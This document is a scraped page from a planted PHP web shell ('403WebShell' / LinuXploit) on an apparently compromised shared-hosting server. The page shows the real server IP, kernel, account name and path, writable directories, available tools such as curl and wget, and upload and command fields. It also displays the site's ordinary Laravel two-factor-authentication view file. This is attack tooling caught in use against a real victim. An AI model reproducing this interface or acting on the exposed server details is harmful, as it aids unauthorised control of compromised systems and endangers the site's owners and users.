Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.124.204
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/User/Views/frontend/2fa/parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/User/Views/frontend/2fa/parts/info.blade.php
<h4>{{__("You have enabled factor authentication")}}</h4>
<div class="mb-4 font-medium text-sm text-green-600">
    {{__("When two factor authentication is enabled, you will be prompted for a secure, random token during authentication. You may retrieve this token from your phone's Google Authenticator application.")}}
</div>
@if (session('status') == 'two-factor-authentication-enabled')
    <div class="mb-4 font-medium text-sm text-green-600">
        {{__("Two factor authentication is now enabled. Scan the following QR code using your phone's authenticator application.")}}
    </div>
    {!! request()->user()->twoFactorQrCodeSvg() !!}
    <?php
    $codes = (array) request()->user()->recoveryCodes();
    ?>
    @if(!empty($codes))
        <hr>
        <div class="mt-3">
            <p>{{__('Store these recovery codes in a secure password manager. They can be used to recover access to your account if your two factor authentication device is lost.')}}</p>
            <div class="p-3" style="background: #f3f3f3">
                @foreach($codes as $code)
                    <div class="mb-2 font-weight-medium">{{$code}}</div>
                @endforeach
            </div>
        </div>
    @endif
@endif
<hr>
<button class="btn btn-danger btn-xs btn-disable-2fa">{{__("Disable two factor authentication")}}</button>

Youez - 2016 - github.com/yon3zu
LinuXploit